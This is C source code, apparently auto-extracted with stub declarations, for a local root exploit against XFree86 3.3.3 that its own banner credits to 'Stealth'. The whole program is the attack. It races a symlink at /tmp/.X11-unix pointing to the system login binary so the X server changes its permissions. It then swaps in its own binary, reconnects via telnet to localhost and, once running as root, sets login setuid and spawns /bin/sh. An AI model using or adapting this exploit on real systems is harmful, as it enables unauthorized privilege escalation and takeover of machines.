
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 char* LOGIN ;
 char* TELNET ;
 int chmod (char*,int) ;
 int cp (char*,char*,int) ;
 int errno ;
 int execve (char*,char**,int *) ;
 int exit (int ) ;
 int fork () ;
 int geteuid () ;
 int getuid () ;
 int kill (int,int) ;
 int perror (char*) ;
 int printf (char*) ;
 int sleep (int) ;
 scalar_t__ symlink (char*,char*) ;
 int unlink (char*) ;

int main(int argc, char **argv)
{

 char *telnet[] = {TELNET, "localhost", ((void*)0)};
 char *shell[] = {"/bin/sh", ((void*)0)};
 char *X[] = {"/usr/X11R6/bin/xinit", ((void*)0)};
 FILE *f = ((void*)0);
 int p = 0;
 char buf[1000] = {0};


 if (!geteuid() || !getuid()) {
  unlink(LOGIN);
  cp("/tmp/L", LOGIN, 1);
  chmod(LOGIN, 04555);
  printf("Welcome!\n");
  unlink("/tmp/.X11-unix");
  unlink("/tmp/L");
  execve(*shell, shell, ((void*)0));
 }


 cp(LOGIN, "/tmp/L", 1);
 if (symlink(LOGIN, "/tmp/.X11-unix") < 0) {
  perror("symlink (/tmp/.X11-unix)");
  exit(errno);
 }
 if ((p = fork()) < 0) {
  perror("fork");
  exit(errno);
 } else if (p > 0) {
  sleep(7);
  kill(p, 9);
  cp(argv[0], LOGIN, 1);
  execve(telnet[0], telnet, ((void*)0));
  perror("fatal:");
 } else {
  printf("Xfree 3.3.3 root-sploit by Stealth. http://www.kalug.lug.net\n");
  printf("\n-> Please give me some seconds... <-\n\n");
  execve(X[0], X, ((void*)0));
 }
 return 0;
}
